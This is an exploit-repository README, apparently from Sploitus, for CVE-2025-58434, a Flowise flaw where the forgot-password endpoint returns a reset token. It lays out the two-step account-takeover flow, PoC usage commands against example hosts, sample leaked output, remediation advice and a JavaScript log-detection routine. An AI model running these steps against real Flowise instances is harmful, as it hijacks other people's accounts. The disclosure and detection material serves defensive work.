## https://sploitus.com/exploit?id=85EF54BC-A345-51E2-8911-097DB2730411
# CVE-2025-58434: Flowise Account Takeover via Token Disclosure
> ⚠️ **This repository is for educational and authorized security research only.**
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Attack Flow](#attack-flow)
- [Affected Versions](#affected-versions)
- [Repository Structure](#repository-structure)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Example Output](#example-output)
- [Remediation](#remediation)
- [Disclosure Timeline](#disclosure-timeline)
- [References](#references)
- [Disclaimer](#disclaimer)
---
## Overview
The `forgot-password` endpoint in **Flowise** (both cloud-hosted and self-hosted) returns a valid password reset token (`tempToken`) directly in the HTTP response body, **without any email verification or authentication**.
This means an attacker who knows (or can guess) a victim's email address can:
1. Call the `forgot-password` endpoint → receive the `tempToken` in the JSON response
2. Use the `tempToken` to call `reset-password` → set an arbitrary new password
3. Log in as the victim → **full account takeover (ATO)**
No prior access, no user interaction, and no email access is required.
---
## Vulnerability Details
| Field | Value |
|--------------------|------------------------------------------------------------|
| **CVE ID** | CVE-2025-58434 |
| **CVSS Score** | 9.8 (Critical) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-640: Weak Password Recovery Mechanism |
| **Type** | Authentication Bypass / Insecure Direct Object Exposure |
| **Affected App** | Flowise (cloud + self-hosted) |
| **Endpoint 1** | `POST /api/v1/account/forgot-password` |
| **Endpoint 2** | `POST /api/v1/account/reset-password` |
### Root Cause
The `forgot-password` handler returns the entire user record, including the generated `tempToken`, directly in the API response instead of **only** sending it to the user's registered email address.
```json
{
  "user": {
    "id": "",
    "name": "Victim Name",
    "email": "victim@example.com",
    "credential": "",
    "tempToken": "",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
```
---
## Attack Flow
```
Attacker                                   Flowise API
    │                                             │
    │  POST /forgot-password {email}              │
    │────────────────────────────────────────────►│
    │                                             │ (generates tempToken)
    │◄────────────────────────────────────────────│
    │  201 { tempToken: "abc123..." }             │
    │                                             │
    │  POST /reset-password {email,               │
    │         tempToken, newPassword}             │
    │────────────────────────────────────────────►│
    │                                             │
    │◄────────────────────────────────────────────│
    │  200 OK (password changed!)                 │
    │                                             │
    │  Account Takeover Complete
```
---
## Affected Versions
- Flowise Cloud (`cloud.flowiseai.com`): confirmed affected
- All self-hosted Flowise deployments prior to the patch
Check the [official Flowise GitHub](https://github.com/FlowiseAI/Flowise) for patched release information.
---
## Repository Structure
```
CVE-2025-58434/
├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
├── requirements.txt        # Python dependencies
├── README.md               # This file
└── DISCLAIMER.md           # Legal notice (read before use)
```
---
## Requirements
- Python 3.7 or higher
- `requests` library
---
## Installation
```bash
# Clone the repository
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434
# Install dependencies
pip install -r requirements.txt
```
---
## Usage
### Help Screen
```bash
python3 cve_2025_58434_poc.py --help
```
### Stage 1: Leak the Token (Reconnaissance)
Confirm the instance is vulnerable and retrieve the `tempToken` without resetting any password.
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com
```
### Stage 2: Full Account Takeover
Use the leaked token to reset the password immediately.
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com \
--reset \
--new-password "MyNewP@ss2025!"
```
### Dump Raw JSON Response
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com \
--json-output
```
### All Options
| Flag | Short | Description | Default |
|-------------------------|-------|--------------------------------------------------------|-----------------|
| `--url URL` | `-u` | Base URL of the Flowise instance | *(required)* |
| `--email EMAIL` | `-e` | Target account email address | *(required)* |
| `--reset` | `-r` | Perform Stage 2: reset password with leaked token | `False` |
| `--new-password PASS` | `-p` | New password to set (used with `--reset`) | `Changeme@2025!`|
| `--timeout SECONDS` | `-t` | HTTP request timeout | `10` |
| `--json-output` | `-j` | Print raw JSON API response to stdout | `False` |
---
## Example Output
```
[Step 1] Sending forgot-password request …
[*] HTTP Status : 201
========================================================================
LEAKED ACCOUNT DATA
========================================================================
User ID : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
Name : Admin User
Email : admin@example.com
Credential : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Status : active
tempToken : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
tokenExpiry : 2025-08-19T13:00:33.834Z
========================================================================
[+] tempToken obtained : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
[!] VULNERABLE: The instance leaks password reset tokens unauthenticated!
```
---
## Remediation
If you are a **Flowise instance operator**, apply the following mitigations immediately:
1. **Never return reset tokens in API responses.** Send the token exclusively via the registered email address.
2. **Return a generic success message** from `forgot-password` regardless of whether the email exists; this also prevents account enumeration.
3. **Enforce token constraints:**
- Single-use (invalidate after first use)
- Short expiry (e.g., 15 minutes)
- Tied to the requesting IP / User-Agent where possible
4. **Apply the fix to all deployment models**, cloud and self-hosted.
5. **Add rate limiting** to the `forgot-password` endpoint.
6. **Log and alert** on abnormal password reset activity.
7. **Consider MFA** for administrator and high-privilege accounts.
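As an added example for items 5 and 6 (not code from this repository or from Flowise), here is detection logic that an operator could run over application logs to surface the two signals this bug produces: one source address requesting resets for many different accounts, and a successful `reset-password` landing only seconds after the matching `forgot-password`, faster than anyone could have read an e-mail. The `key=value` log format and the sample lines are constructed for the example; Flowise's own log format is not described on this page, so the parser would need adapting to the real one.

```javascript
// Added example, not Flowise's own code: detection rules for abnormal password
// reset activity, run over constructed application log lines. The key=value
// line format is an assumption made for this illustration.
const FORGOT = "/api/v1/account/forgot-password";
const RESET = "/api/v1/account/reset-password";

// Constructed sample log: a normal user, a reset pair that matches the CVE
// pattern, and one address spraying forgot-password across several accounts.
const SAMPLE_LOG = [
  "ts=2025-08-19T12:00:00Z ip=198.51.100.20 route=/api/v1/account/forgot-password email=alice@example.com status=200",
  "ts=2025-08-19T12:04:10Z ip=198.51.100.20 route=/api/v1/account/reset-password email=alice@example.com status=200",
  "ts=2025-08-19T13:00:33Z ip=203.0.113.7 route=/api/v1/account/forgot-password email=admin@example.com status=201",
  "ts=2025-08-19T13:00:36Z ip=203.0.113.7 route=/api/v1/account/reset-password email=admin@example.com status=200",
  "ts=2025-08-19T13:10:00Z ip=203.0.113.9 route=/api/v1/account/forgot-password email=bob@example.com status=201",
  "ts=2025-08-19T13:10:01Z ip=203.0.113.9 route=/api/v1/account/forgot-password email=carol@example.com status=201",
  "ts=2025-08-19T13:10:02Z ip=203.0.113.9 route=/api/v1/account/forgot-password email=dave@example.com status=201",
  "ts=2025-08-19T13:10:03Z ip=203.0.113.9 route=/api/v1/account/forgot-password email=erin@example.com status=201",
];

// Splits "k=v k=v ..." into an object and adds a numeric timestamp.
function parseLine(line) {
  const rec = {};
  for (const field of line.trim().split(/\s+/)) {
    const i = field.indexOf("=");
    if (i > 0) rec[field.slice(0, i)] = field.slice(i + 1);
  }
  rec.time = Date.parse(rec.ts);
  return rec;
}

// Returns one alert object per finding. Thresholds are illustrative defaults.
function detectResetAbuse(lines, { windowMs = 5 * 60 * 1000, maxAccountsPerIp = 3, fastResetMs = 60 * 1000 } = {}) {
  const events = lines.map(parseLine).sort((a, b) => a.time - b.time);
  const alerts = [];

  // Rule 1 (rate limiting signal): one address asking for resets on
  // maxAccountsPerIp or more distinct accounts inside the window.
  const byIp = new Map();
  for (const e of events.filter((ev) => ev.route === FORGOT)) {
    const hist = byIp.get(e.ip) || [];
    hist.push(e);
    byIp.set(e.ip, hist);
    const recent = hist.filter((h) => e.time - h.time <= windowMs);
    const accounts = new Set(recent.map((h) => h.email));
    if (accounts.size >= maxAccountsPerIp && !alerts.some((a) => a.rule === "spray" && a.ip === e.ip)) {
      alerts.push({ rule: "spray", ip: e.ip, count: accounts.size, at: e.ts });
    }
  }

  // Rule 2 (token never went through e-mail): a successful reset arriving
  // within fastResetMs of the forgot-password request for the same account.
  const lastForgot = new Map();
  for (const e of events) {
    if (e.route === FORGOT) lastForgot.set(e.email, e);
    if (e.route === RESET && e.status === "200") {
      const req = lastForgot.get(e.email);
      if (req && e.time - req.time <= fastResetMs) {
        alerts.push({ rule: "fast-reset", email: e.email, ip: e.ip, deltaMs: e.time - req.time, at: e.ts });
      }
    }
  }
  return alerts;
}

for (const a of detectResetAbuse(SAMPLE_LOG)) console.log(JSON.stringify(a));
```

Rule 2 is the one specific to this class of bug: with a working e-mail-based flow, the gap between request and reset is measured in minutes, so a gap of a few seconds is a strong indicator that the token was obtained from the response body rather than from the mailbox. Tune `fastResetMs` against your own users' observed behaviour before alerting on it.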
---
## Disclosure Timeline
| Date | Event |
|------------|--------------------------------------------|
| 2025-08-19 | Vulnerability discovered and reported |
| TBD | Vendor acknowledgement |
| TBD | Patch released |
| TBD | Public disclosure |
---
## References
- [GitHub Advisory GHSA-wgpv-6j63-x5ph](https://github.com/advisories/GHSA-wgpv-6j63-x5ph)
- [NVD: CVE-2025-58434](https://nvd.nist.gov/vuln/detail/CVE-2025-58434)
- [Flowise GitHub Repository](https://github.com/FlowiseAI/Flowise)
- [CWE-640: Weak Password Recovery Mechanism](https://cwe.mitre.org/data/definitions/640.html)
---
## Disclaimer
This project is intended solely for **educational purposes** and **authorized penetration testing**.
- Do **NOT** run this tool against any system without **explicit written permission** from the system owner.
- The author(s) of this repository accept **no responsibility** for any misuse, damage, or legal consequences arising from unauthorized use.
- See [DISCLAIMER.md](./DISCLAIMER.md) for the full legal notice.